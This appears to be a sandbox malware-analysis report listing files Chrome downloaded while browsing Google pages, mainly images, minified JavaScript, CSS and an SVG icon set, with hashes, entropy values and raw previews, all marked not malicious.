                                                                                                                                                                                                                                                                                          Preview:/**. * @license. * Copyright 2017 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */const t=(e,i)=>i.kind==="method"&&i.descriptor&&!("value"in i.descriptor)?{...i,finisher(r){r.createProperty(i.key,e)}}:{kind:"field",key:Symbol(),placement:"own",descriptor:{},originalKey:i.key,initializer(){typeof i.initializer=="function"&&(this[i.key]=i.initializer.call(this))},finisher(r){r.createProperty(i.key,e)}},n=(e,i,r)=>{i.constructor.createProperty(r,e)};function o(e){return(i,r)=>r!==void 0?n(e,i,r):t(e,i)}export{o as n};.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 512 x 341, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):323693
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.986068807868667
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:jCZe/GmUFwAl6L240d3d0EHEmlMH+acoh0uBScbxJ6BOypcdjavgtbZbP:uZSGwAQi400MSH+JFwbxW/cxavgdZj
                                                                                                                                                                                                                                                                                          MD5:C19A35B9FBABC519C356B7A8FF127C55
                                                                                                                                                                                                                                                                                          SHA1:DAC23554B6E97E8F7FE0FD354406587D66170A9D
                                                                                                                                                                                                                                                                                          SHA-256:C5E75F3FA399C432FD34B737C23D79504819E25FC4464D19A94A16DBB2AC4CD9
                                                                                                                                                                                                                                                                                          SHA-512:54EC86ACA719C35C1B691A07CB8FE9D238EE11615C41B81D9D0AD2E78994B87E8A02FBB041300D8E3706E941FD2445D5C254EEA0EB05B0DC5BEE96A1DAAF1D99
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.......U........t...4IDATx.L.Y.t[....f5.....}v73.*.!Yd..D.&A.....~....?...~.a...7.%X. .@.E.%..*feS73o67o....nwk.9.....N. v..;f3..c...?.'....`lF.f.........."...( ....". ..(*.. ...!2...h..`.`.....@.|.<..!.2..K..!..C$.F."T3@`".@4....M.F.....<...O.?.v...J..M..P.((fP.c@.#.P.....7....."1....|..o....V.".BDDl...`.h.`.p. .h..D...&.@.Q........NW..........0#.#...).).) :0BD2D3#......0..)."..!......b.?....M0..........'.<Z[...\.w?......{.?....?x...8.Y.X.....o?....72.../.....?.......x..'..'.....?.2..p...D>.C.x......)..fK.....Y...tx.......|.[..........s/q?...|...9..~w..Y....]...~..B..p.z..J.s...s.A..s>$...H%..L.@2.c].7.O.../.....( ..).....0.N.......?...2^}........}....,7R-.l.851.*...=..F&9{t.<..3J1.......gI..c.5.j..oF..d..2......p..C..!...r.4...[TuU..*(8.n..1..4......\;B-2...x.S.....X...)jRun]..G.......O....uk..j..on.uy...X.l.6......*..q....Y......#5hmW.v&......n.G..<..H...7....{i....q.y..zs.<...e.h-8T..R.b.\.:>..t-F..@`.S..StI.....~....~~.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 832x460, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):45100
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.995251890618906
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:768:eRXKdqZ4xfYOO3IwLEUvJaHtSgDzyhyKnzV2yaA6afjnzczy8+oJZMkBHMsYc8:aGqZ4xf17HZ3EZzJaAbIyl8ZNM88
                                                                                                                                                                                                                                                                                          MD5:20436A29B6FD849F2612B96038E23139
                                                                                                                                                                                                                                                                                          SHA1:D6B0170AFF0151688F7F550F6B2715502F5C9A52
                                                                                                                                                                                                                                                                                          SHA-256:8652CBBD238192C0DEF5DFD04BC6BFE00A28A247C1C6B224764A1C9FBE494B01
                                                                                                                                                                                                                                                                                          SHA-512:FFC0231BE0F0370C07A79E0EC946C252E217288214098CCA90B5197BD9C8746D5A724376E66C4C8DD56E0C60950FE2A0099984BAE5C51C6A5AA0F18907B45A41
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/VzZoNfTFy0Q5bMd9mVfo4M7dp1-OXWmUWsSAttnwnbw6agWisqAeJeJUCzxiZq1UhJff1rvLgHGOfQ7N44OdZHUdN66d3lEIwHh0=s0-rw-e365
                                                                                                                                                                                                                                                                                          Preview:RIFF$...WEBPVP8 .....=...*@...>I .D..!".R.8P..cno.z..~k..kG..P>kzZ.x..W._X,...........a................o...?2.i........................-._.......z....~............/..._............+.....O.g....k..=.z.~U....j./.w....{.o..._.?..S....W.$.........4.g<................~........C.A................<..-.-..z..P1N..{.F....LGY...5...u ..9.<M.{.5....P{.x{...=..$B....h..6K..4..u..$w.P..p!..../.uo..4...Q.....d...2.....g.s..Ta..9.&........aY...;..iB....^....sQ....X..<.,.D..h..PL.a....b...Y....P..ox.n\.......EU.,...L....:..n.Q..AU...h.J.81..k...{@..<.?....C..j.........A.......@...o.a..g..q.....^..(...7.p..........Q.pH..`Vs.l~....Q..u..cb2....$n......T..v..=sO&._...`.$......8..$Y....5.S|.....r.0....~.CY"5la....:r&.....ok......_Hk.n...Uj.'.p.M..^._....=.L.6..i.WzaG.P.I....pf}..B).u..r..W\Y.:.....|.h...$..-}......#x.p4.5T..$..k.|\.......b.....xF.{J.......I./...l..t..|.3q)m%.fR.O?,.#3....].`w..l..\.tn..c...^....."<..5j...t.S.....n..`:..\......Q.,?..'.G...1....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):5188
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.952928145135762
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:9JKglioE6pMcO5oiXZuh+u/U7pLnZ0jnn7dwp5KRf0271XM8zAJPzSjCWdJ28/p2:9J66pTOlI+u/U7pLnZ0jn7dwuRfU8zAd
                                                                                                                                                                                                                                                                                          MD5:714ACF1F5A07C6204BBD7E59194A2870
                                                                                                                                                                                                                                                                                          SHA1:3F8170F84AA88CC81D56C4383CF3758E7945D71F
                                                                                                                                                                                                                                                                                          SHA-256:1C58D90328C77231DAAA4F46073F3BADE862DB0E24A896F1B17912BB52C0FDDA
                                                                                                                                                                                                                                                                                          SHA-512:FE1D52B327E09B1936B156546DF09F10802ED8D51C474217F4E02FFB8C312F519540136833C5E51A07CC7E25A748F2DECAC7D393885BF4AF05A53CB9C52465B9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/kroer1kpwSe3j-lIfPnE7Q3MVaCoJVF8atjdh0VtGDWCz2ulLejVsDh2k6a6VUgpUFQ8qRMHMEX7bsr2jTrLXhZR_ETbqILDf-qfkk0=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx..y.T..?..^Uuu7.44;..K..n.Mp.4..Fe.......dr.1.....%.q"q..h......3!.9..M7.`\..l..&.MwUW...?Z<4T5U.....>.p..{..~.}........(P O.\;.)v\.....KP..)....Z.b........b-b<..W$f ..A$b.r....~.L.e...2.;b{[..#eFt0*.A...P...2T.#...U-..E...h=p@.N............/.}.+.....v..%.GS..2.....*.A.lE.B....Q.Aw!...g..5...[CM...k6x.6..y/...'.....a.@......m..ETv"l.j.....}W.~.]O.#/..u.XW\g..~.1.LPaX~9....V.Z./...U..\{u4y...~..X<../.0.t.H(.~..*V.7....U...6......WH]... .-P..$O|K......{z.s..z.......&L..7..$..\..!v...*...^.J....._<..9...3....\.....DY.h2..\[..b;'..]8.r.s?.A@ .>d....S...U...6.U.w.3,....Q.3.(..<.....+k.).F.&..*.3...0"[6...5.fz....d.\V...s.c^.d..@8W..z....c.G.|~\YK...9o......c&r.....~....:...{..%y...O.O....}..~.p3.`dLo9.g..U.F... 8.^.gj._.a"...}e..ll:....h...m.....q.g.2.d*..I.K.5.p. ...m...e!...|E..~..X+.@.....>[..8(.>.wy.A?MeD.=S...N....A...k.-_^].N.....eq.PsIA..X.....|yuC6Lv....X.HA...|..._...P..vJ....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 501 x 501, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):309590
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.992244642963286
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:6144:xOp8YT9UJfqNVywuYa55uxLdF0ipqeKmkO4CI5o2NUDbOy38AD:xhSGOyTT55kL2yky2oO7a8AD
                                                                                                                                                                                                                                                                                          MD5:7847D59E906120A457B281E6FF7075D6
                                                                                                                                                                                                                                                                                          SHA1:695A65F61F1F982346FB00F2F55E7BAD1AA234FD
                                                                                                                                                                                                                                                                                          SHA-256:32A272326C7764A78E031CF14B44EB76494770277F45D92E916E34EC22A4C704
                                                                                                                                                                                                                                                                                          SHA-512:797D2594F5F326CC33954C21C5A2C6F3AF55D7E9D92C9EB3B1839F65C135A648EAD72A3CDC3F5890E43AA790F39D1C84D3EC3B0D3B43EB41670B46EB7403420F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/SYJjR49xZyK-9URac4orKxAmzd2WAsUzdASks4p_ISkig5-FdBZai-rO2zQQiAxF9mGOwrh8CxGIAMubj81QQpBECMmtqA4ow30EysS-mZ5Bvx9EcX0=-w501-e365-rwu
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR..............Hg.....sBIT....|.d... .IDATx..k.%KV.....{.s.O.}?.....Qx......0 <.....l...#..!3....2.?,.+lK&B.%...0...I..6....ax....>}.u..c..*..d...j.......qz.]....Q.[k..,`..F.i..FzC.....4.H..........O?.8.=.\.......GGO...<2.<....c....v..y.....g..vU.[......@.`..&...W..D`f......j.^v]7.'..[v]7...{..{.j}..d~...{..g...|w...;<>......W..F.i.@#..4.+@.\....|>..w..o...j..g.y.K....m..N&..4Y.V.......w.f.."...L.b...@D...X(..........)]w.0....f..L....d.w....n.W.~....|vg...3O.m.....G.i..i...Fz....[...w...{.{.....>8z.......6..i"W.m..@...........!..........NH!..3.RZ...N..}...D...K.z..g..&e!.F...J.....N&.....kGGG..p........[.y..K?GDV..i..^...>.H/..\..o............z.|.x....=G.........(..0&B...p1...@..@....XC:.C.. Z.nZ.....Q.P.....2....b...J..r1...........5f....c.......~....04#......G..tr.....^......{O_.\...B..l....e+Zll6v..A..8..-...$.om7s.T.G%. ...l....D.....x.w..5.3..A.PK....\B.F.y.....".K..{......>..5..w...............>d#.....G.).
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (550)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):1521
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.101184639212981
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:XrNYmlt2e2/kDwQmMIHwhIZ5Ur1gLEFukO9/j1I6gWaagYj1qWrsRrd7RyUJ1yLs:XrNPKEV7IwhemJgtB9TaagEqphAUJ0s
                                                                                                                                                                                                                                                                                          MD5:31802EB7C75861B3CC62A130ADF4110F
                                                                                                                                                                                                                                                                                          SHA1:49D4038BB9868D7FB503176AE7EF9AA71B7CB374
                                                                                                                                                                                                                                                                                          SHA-256:B87A7F1BF6904712F5C36D2A922B2D277313BF97E9857B3634C5B3D50BEC2D31
                                                                                                                                                                                                                                                                                          SHA-512:4943EE95DD995549274328AD6A69AE34BFCB0D1F1A3F5FF2DA37E0B876FDC9FC9D6D333CF4FC8EBF855D22DAE89C8FD00EA59BE45AEFF5EA757CC4ACF8936C94
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/xjs/_/js/k=xjs.hd.en.dIEp8Iy3TZo.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAIAgQAEAAACAAgAAAAAAAAAAAAAAAAAAAgQBAEQCAAACAOAAACAQAAABAAISAAABEoBHmQAAEQBMAAAAAAAQAAAIFAEAQAAAAAYAAAABAAAAAAAKAAAAAAAAAAAAAAAAAEAAgQAAAAAAAAAAAAAgAAAAAPQAAAAAAAAAgAAAAAECAANkAAIAAAAAAAD6ACB4AAwpLAAAAAAAAAAAAAAAEIAEwVxIQEEAAgAAAAAAAAAAAAAAACAlTVzY/d=0/dg=0/br=1/rs=ACT90oHQtgb1Vp7_2FMfyCLADlsBNbpGNA/m=aLUfP?xjs=s4
                                                                                                                                                                                                                                                                                          Preview:this._hd=this._hd||{};(function(_){var window=this;.try{._.w("aLUfP");.var Dqb=function(a){this.Sp=a};var Eqb=function(a){_.Bn.call(this,a.Ma);var b=this;this.window=a.service.window.get();this.ta=this.Sp();this.oa=window.orientation;this.ka=function(){var c=b.Sp(),d=b.HXa()&&Math.abs(window.orientation)===90&&b.oa===-1*window.orientation;b.oa=window.orientation;if(c!==b.ta||d){b.ta=c;d=_.Sa(b.Nd);for(var e=d.next();!e.done;e=d.next()){e=e.value;var f=new Dqb(c);try{e(f)}catch(g){_.ca(g)}}}};this.Nd=new Set;this.window.addEventListener("resize",this.ka);this.HXa()&&this.window.addEventListener("orientationchange",.this.ka)};_.C(Eqb,_.Bn);Eqb.Ga=function(){return{service:{window:_.En}}};_.m=Eqb.prototype;_.m.addListener=function(a){this.Nd.add(a)};_.m.removeListener=function(a){this.Nd.delete(a)};._.m.Sp=function(){if(_.oa()&&_.la()&&!navigator.userAgent.includes("GSA")){var a=_.ol(this.window);a=new _.dl(a.width,Math.round(a.width*this.window.innerHeight/this.window.innerWidth))}else a
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):502220
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.438505233432353
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:gq0RALOrS7VPeDIMnRs5BL5kREHLvRiDtKPuuD+heOT57QL:Qu0S7VPeD3kBS+74DtG+hDT5cL
                                                                                                                                                                                                                                                                                          MD5:21204779BEBA794BB0A15EF1E67BACC5
                                                                                                                                                                                                                                                                                          SHA1:35548E7215989C071BCCB2BE50F541CB79B76ED7
                                                                                                                                                                                                                                                                                          SHA-256:52542504DB8E9BCF1CEFFE402D516FA0DCE39B6A7A4B88763457CD5532CDE9D5
                                                                                                                                                                                                                                                                                          SHA-512:EF132E326E818422535F02EC36167FD268CABA263EC1F185DC24AFA6D981C96D19895F7F62E7367AA2B8B66B6938E2546EAE417FA9B01DFFBFF71B6950CD6903
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/1RU8Tw2qIdW1W809P_jE62_9EGnxtBRL6TgQ95AFO1zH-ShZ5OdhAceX9vhp7I8Aan1-mPneQlg7iBBls7Z46KpPXCFAIyrxfH5h94s=rw-e365-w2880
                                                                                                                                                                                                                                                                                          Preview:RIFF...WEBPVP8L..../..D..u!...R....Q.!"&..mx@.T....Ak....g.S...........}.ml.....h.@.c.6Ih0...IP.C.p.]..#h.&s.y.......)N.Lh..t..e.;...jO3.SY..%..ES...J.@n......`..`.K\.......EB\..............WuWK...N...!.a..p.:+w........:.....3. ...A..........}...m{vKm..~....wUQ.H...2 [-....c..(M.u.;.s..s.9.t.;9.>d.n...D.Y`Y ,...B..`..k..{n..-.6I.....W ">...-.cfN...TL.Q1.`.iy.h....d.U.hk...F...?...7.....H. .b.C...DItbK.....=[.$o.y......F_.....3.k.o.6..(...v.,.. .3..9.Q .@..}.._UwUw..5../l.m.l......+.#.J..F......9lkqjm`m.mc.f..f9I%.._...}...m.mj.....}...uf....OV..M...P#...Z......W....^..................m...m.......M.R.....:N:3t.Fa...+...X.\.F......W.m.Qj%.}o.......-...~......S...(.$H.Q"%*...D.#{D......,..vk.:..n... v......e........"2*W...Z.........*.."....E.jK.$...>..#.QQV77t..dff..b.o../f.J...V...2...I..EE..\8g.5}]...F.u?..}..1.....d.b9Ur.9q13...V[U{.[[.....d...!...p.s.1z...>.}.,.V.F.6i..C.y.".....}9ml......M..1..m.qc.f&000........=..[."fR.Nv..... .
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Java source, ASCII text, with very long lines (1390)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):1391
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.170264642532743
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:yTI7loogJdG5DQfNe+RfsxkvXCLuCvXihZyDd/RsY8M6yDdgk/dnJpY7lzQtXHmo:77lJgiBQFQxkuJZTddgynY7SmwTuvtI
                                                                                                                                                                                                                                                                                          MD5:F567AA5D3C76C18F9ABEAC37FE878A5F
                                                                                                                                                                                                                                                                                          SHA1:DF0AFC0AC30FF760C0CCA4C3E83C45DB3F95DD12
                                                                                                                                                                                                                                                                                          SHA-256:5C4AFD14A61034C70CA3A1BF8472ABC6CCC03BE980E74298713810D6E436D2D2
                                                                                                                                                                                                                                                                                          SHA-512:1EA54B7B90CA0B36D3874E9D1384059909B05DEDE88C7AAD011610606E542916367135895E81479F07A80A5D2D8A5322B82DDFF1AFB33965E21962C20E64FD2E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/search/howsearchworks/assets/EWy3lfep.min.js
                                                                                                                                                                                                                                                                                          Preview:import{d as c}from"./zRFBfJZH.min.js";import{s as n}from"./ycaG4YXp.min.js";import{e as h}from"./0XPwTFcg.min.js";var u=Object.defineProperty,b=Object.getOwnPropertyDescriptor,v=(s,t,l,r)=>{for(var e=r>1?void 0:r?b(t,l):t,i=s.length-1,o;i>=0;i--)(o=s[i])&&(e=(r?o(t,l,e):o(e))||e);return r&&e&&u(t,l,e),e};let a=class extends n{constructor(){super(...arguments),this.scrollY=0,this.direction=0}connectedCallback(){super.connectedCallback(),window.addEventListener("scroll",this.onScroll.bind(this),{passive:!0})}disconnectedCallback(){super.disconnectedCallback()}disableSticky(){window.removeEventListener("scroll",this.onScroll.bind(this))}firstUpdated(){this.globalNav=this.querySelector("#globalNav"),this.globalNavSpacer=this.querySelector("#globalNavSpacer"),document.querySelector("hsw-jump-nav")?(this.globalNav.setAttribute("has-jump-nav","true"),this.globalNavSpacer.setAttribute("has-jump-nav","true"),this.disableSticky()):(this.globalNav.setAttribute("is-absolute","true"),this.scroll())
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1689), with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1689
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.640520027557763
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:ifKf9wIe7P3SJgX4DW45JUzBG/t5JUTLF5Jv325Jvhv:5De7Pn4DW+Go3GnXdcHv
                                                                                                                                                                                                                                                                                          MD5:45DD7BD58C9F085DA52FA16A2A150066
                                                                                                                                                                                                                                                                                          SHA1:9B5CF4B288EDE14AE8834F3EF2A58145B8EC8CBC
                                                                                                                                                                                                                                                                                          SHA-256:0D5C53FCC37C7A2CE26367BBE6197FCD9272DD7EBC81823D088A4DFFF5AE599B
                                                                                                                                                                                                                                                                                          SHA-512:520B8DF68524C2CEF393B837D7EAD0168028C94697E1DA0AC4BDDAFAB849D1B26D7E7933082146AE6A220A449F066CBBBA2EBFC6CC30D3F756FBD98EE061C8DF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.MTIaKb,.LwDUdc,.FAoEle,.RlTCPd,.wPNfjb,.caNvfd,.Vnob4b,.bbxTBb,.DpgmK,.YKUhfb,.uNnvb,.aVsZpf,.RoOVmf,.dIfvQd,.V3Ezn,.Enb9pe,.mYuoaf,.kJSB8,.tUr4Kc,.iQMtqe{--Yi4Nb:var(--mXZkqc);--pEa0Bc:var(--bbQxAb);--kloG3:var(--mXZkqc);--YaIeMb:var(--XKMDxc);--Pa8Wlb:var(--Nsm0ce);--izGsqb:var(--Nsm0ce);--todMNcl:var(--EpFNW);--p9J9c:var(--Nsm0ce)}:root{--KIZPne:#a3c9ff;--xPpiM:#001d35;--Ehh4mf:var(--Nsm0ce)}:root{--Yi4Nb:#d2d2d2;--pEa0Bc:#474747;--kloG3:#d2d2d2;--YaIeMb:#f7f8f9;--Pa8Wlb:#0b57d0;--izGsqb:#0b57d0;--todMNcl:#fff;--p9J9c:#0b57d0}.EpPYLd{display:block;position:relative}.YpcDnf{padding:0 16px;vertical-align:middle}.YpcDnf.HG1dvd{padding:0}.HG1dvd>*{padding:0 16px}.WtV5nd .YpcDnf{padding-left:28px}.Zt0a5e .YpcDnf{line-height:48px}.GZnQqe .YpcDnf{line-height:23px}.EpPYLd:hover{cursor:pointer}.EpPYLd,.CB8nDe:hover{cursor:default}.LGiluc,.EpPYLd[disabled]{pointer-events:none;cursor:default}@media (forced-colors:active){.EpPYLd[disabled]{color:GrayText}}.LGiluc{border-top:1px solid;height:0;
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (3349)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):4778
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.311499526671108
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:X7VfjpQggW1F5118PrFth/0ZuIZ3iVY0Y0uiRFnHe+M61dM4oPZUARcRfKPyJqb:XpfZ57cR/KpeY0YE++/BlooCa8
                                                                                                                                                                                                                                                                                          MD5:74AE03DE4D07836C6EBB91E00E5AB8E6
                                                                                                                                                                                                                                                                                          SHA1:98CE84BB4F325B80AA657824FE55B7BB159CE030
                                                                                                                                                                                                                                                                                          SHA-256:DF21B45313EEB6DC1855782370C74A00803B9CB8313C705620B7554BB6FC46E5
                                                                                                                                                                                                                                                                                          SHA-512:871AB6B36E001E75D1282316A24E7DE6BD76E19B0C5AA6C907682EDBF52766FB04F4A27BB54C9CBB5ADA3C6C59CEFC61194AEA50BAD301F2D75F9114E17BB29F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:import{r as m,s as v,x as u}from"./ycaG4YXp.min.js";import{e as b}from"./0XPwTFcg.min.js";import{n as w}from"./IYoTYjYE.min.js";import{t as p}from"./ianzD0dL.min.js";import{e as h}from"./p9kcPq91.min.js";import{i as y}from"./IFunn9hk.min.js";import{o as d}from"./5Ss99t85.min.js";import"./_OAi-NRQ.min.js";import"./RpI-OtYr.min.js";import"./rwBjrn-0.min.js";import"./bAPu5B1A.min.js";import"./lHimDk5Y.min.js";const _=".container{width:100vw;height:100dvh;position:fixed;top:0;left:0;z-index:999}.container__overlay{position:absolute;width:100vw;height:100dvh;top:0;left:0;background-color:#202124}.container__close{margin-top:2px;--hsw-icon-color: #000}.container__close,.container__overlay{transition:opacity .3s ease-in-out;pointer-events:none;opacity:0}.container__close\\:visible,.container__overlay\\:visible{opacity:1;pointer-events:all}.drawer{--hsw-button-color: #5f6368;display:flex;flex-direction:column;background-color:#fff;position:relative;inset:0;z-index:50;height:100dvh;transition:t
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 2402x1598, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):145756
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.998366208902574
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:3072:xvdGYytbiomWSliyLp3OdDcatD7RcozRRMCUzYvBt8azozh:xYYCbvmWSMjdcWRcsHNXj0V
                                                                                                                                                                                                                                                                                          MD5:5CC25E5CC3C77C617BD55EDE724CAC78
                                                                                                                                                                                                                                                                                          SHA1:F2B936EB384F30A09DCBBA427126AC72E140D2C4
                                                                                                                                                                                                                                                                                          SHA-256:983B332A37E36A8397CA4A5DA9CFCE9230EDAE6BCD0D343984FAAE223CA44329
                                                                                                                                                                                                                                                                                          SHA-512:D2DE6806692F7FAC7330CF86C71D9AC0C8D87E32649E1DBA4F8B15C26A2A3BB194870F69028815F48C1569522DDACD8AB5F16EA96DAD4926AC947CA6F441FB70
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFFT9..WEBPVP8 H9.......*b.>.>m6.I$".&"1.....in..j,_...[...O..g....W...0......s....n...9.{............{7O.[.>..ia.....}5...v...W+..N...........j.......?.......>..5._.=m...].........O._s.?.......>.?..?.......Y.......2...U./....._.=W?G...G....#....b.r?........G....w./..K.6......g...?........o.?.?..y='?xD.&....:....4..p|}....#..W....G.]..bB....P......./..%...V...7^......(%2^..FB...n.j......{.....VqA2.D.h.F..,=...Y..A.KNE.G..l.'......7.p..5..M..Z.[.....o.!y..Y....t.......F0.V.^8f....1%..:..N...?ez.5;j}F|AC.c.A.xt S;g.E..>.J..B..`...E.....$6\.....\~..9..xU.[..*wu....vD+c...U.].<..p"....j..;.".|..pN.g+.g........'....p..;..r..u.....,I].Q.Z......g;,.g..QFF..yp1..n...Kn.[n.M....n.....#y..:4V.S.....}..{.]...w.;.;+.....]...t.+qP.m..u.P..m.........\.....U.M..B9..z...G......."...T.......}b=..3[j..HT..83N-8...Z.j....$..f. .{Uw6wGJ.&....J#..Q._.Un2B@..;.......v..u......U.......~!U..`dm...k...........3...-O....... .Eb....9P.W...$.{...i.1.H?..r.R.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):14116
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.65552037622446
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:xkV/Jtv95PDg1g0Sx3Leu4UX644Y48TeJKCR3jIL3n4Z:xkV/JtvPca0Sxbeu4UX644Y46KKCR3Au
                                                                                                                                                                                                                                                                                          MD5:AD4439B83B65F1CA4CD6C81178DBC6A5
                                                                                                                                                                                                                                                                                          SHA1:F505AF59D6CD81DA9C153622F7F09ABE812073B6
                                                                                                                                                                                                                                                                                          SHA-256:254A7C313076C3CBD2A21E78C9C9762DBEDFF5F3D21CAC6090A8C4F67334E942
                                                                                                                                                                                                                                                                                          SHA-512:690AC84ED5CC5C3BB34CA3207401E601CD065CE8725AC5A50219962108F15BE64CAA09C8D2D07ECD159B2A32330F27A6061FA18027379D574200B9813AC68D2C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg">. <defs>. <svg id="chevron-left" viewBox="0 0 24 24"><path d="M16.41 5.41L15 4l-8 8 8 8 1.41-1.41L9.83 12"></path></svg>. <svg id="chevron-right" viewBox="0 0 24 24"><path d="M7.59 18.59L9 20l8-8-8-8-1.41 1.41L14.17 12"></path></svg>. <svg id="expand-less" viewBox="0 0 24 24"><path d="M18.59 16.41L20 15l-8-8-8 8 1.41 1.41L12 9.83"></path></svg>. <svg id="expand-more" viewBox="0 0 24 24"><path d="M5.41 7.59L4 9l8 8 8-8-1.41-1.41L12 14.17"></path></svg>. <svg id="arrow-back" viewBox="0 0 24 24"><path d="M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.41L7.83 13H20v-2z"></path></svg>. <svg id="arrow-forward" viewBox="0 0 24 24"><path d="M12 4l-1.41 1.41L16.17 11H4v2h12.17l-5.58 5.59L12 20l8-8-8-8z"></path></svg>. <svg id="arrow-upward" viewBox="0 0 24 24"><path d="M4 12l1.41 1.41L11 7.83V20h2V7.83l5.58 5.59L20 12l-8-8-8 8z"></path></svg>. <svg id="arrow-downward" viewBox="0 0 24 24"><path d="M20 12l-1.41-1.41L13 16.17V4h-2v12.17l
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
